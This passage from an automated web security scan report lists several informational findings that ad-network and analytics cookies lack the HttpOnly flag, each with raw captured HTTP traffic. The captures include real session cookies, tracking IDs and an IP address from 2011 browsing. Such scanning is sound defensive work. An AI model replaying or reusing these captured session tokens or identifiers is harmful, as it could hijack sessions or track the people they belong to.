Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29458; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3226249.js^2^1317599341^1317599341&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:49:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226249"
...[SNIP]...

14.172. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-8.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-8.js?cb=0.03134333691559732&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; rdk=8154/13209; rdk1=0; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk8=0; expires=Mon, 03-Oct-2011 00:53:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses8=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29181; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi8=3226247.js^2^1317599462^1317599618; expires=Sun, 09-Oct-2011 23:53:38 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1324

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226247"
...[SNIP]...

14.173. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x29f159.js&size_id=15&account_id=7743&site_id=12359&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; rdk=7743/12359; ses15=13378^2&13209^2&12566^1&12359^1; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:41 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=1; expires=Mon, 03-Oct-2011 00:52:41 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^16cd1be6a76b2fd99d77d4996&12359^10; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29238; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1426

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3198298"
...[SNIP]...

14.174. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=052836ce; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202f2ddfb; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.175. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320578927c; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f; Expires=Sun, 01-Jan-2012 00:31:32 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.176. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c319b371e20d5ad0b40a14440bb04b4f5dc0dbfd8bc62a028eccbe38ed5053c56037d2ecb936ad8922b955414ac716ea905366cd9eafd20cc3a6a141382d0d868350ea1bc32e35d8473431a7b1788ba3f5a3f22ae101e47545dd791fef2c553da4a6ea6d0830c36fa15a39f127d6d40bcd1edca75d20c8a340f8602cc7079cfc5dee0e8412c90521ea705ba06acc46886427f6e66c9819af4f8f3a2d6a200cd28095a794607dcff6fbce9fcce9c7bfdf517a53a48a9e81950b1f16d0177c1e9750d153047273d5069f18aaf0b3f956e5390a5fb1612353317f9b325f37332df0b97a7f9f37204b6747463b07969349cb9aa6b27eb4042ddf27b46e16437a69ece3bc31535f1140bc2bd8b4c3fe40891a559fdd2316fd4c951a5efa70ff90039cab73ae8cb63d584c62b375a0ab1a2b6c0623cd986b1a4c856899fef33ea0c1affe0d8d6bf1400d26527edbc646525d5701baed4d1d5f8fb088110a14efb0ee1ed507b31318da9deb9be3630c784eb31f942b04206efe59e57d918ef5ca0c3e62a254ce4f8583e8b6cd243a513901a1cd069c1b03a0fad059bdc8f924888ea6826a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fbab01c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f5
8329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce7240efd4913d696e9b747f4ca7f69ed2f47a77c1f267838e9909366e35c6ea1be13aab2582a10da3aa45c347aff1c1a5d657f031f1c4c18b8c1ba1d010a97aa5129dda6a3db710e1811f8242ae6da1e341b3b7341a89bf7142b5714c9ef18c2df50b8054b7267c6fb2e60d8e291e41f535924eeee9d08acaff57c2041071bb307ff26acbe11900302b2ed94f3c95aaa11236f117959ab1de1cc8334ca0a0d89a8e2aad85237b6e4cd8d63267d20ef26d572726602b6b0b03004f776a650b9b1df3fb8200745f7c3617ad157a34076896f957260a99ace901d39176c9821effa0ea05188d7b2d4da65a344fe16649d1c1e9256695dff6e6ad8db250af6a1b82f665d6fd0b2e01a9bf1dafb3fbd71c3c36a4b2811bd001f598b3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f00297bec; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.177. http://ots.optimize.webtrends.com/ots/ots/js-3....[SNIP]...

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3....[SNIP]...

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3....[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f0088adcd; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.178. http://ots.optimize.webtrends.com/ots/ots/js-3....[SNIP]...

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3....[SNIP]...

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3....[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:51 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320333bd69; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; Expires=Sun, 01-Jan-2012 00:29:51 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.179. http://ots.optimize.webtrends.com/ots/ots/js-3....[SNIP]...

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3....[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
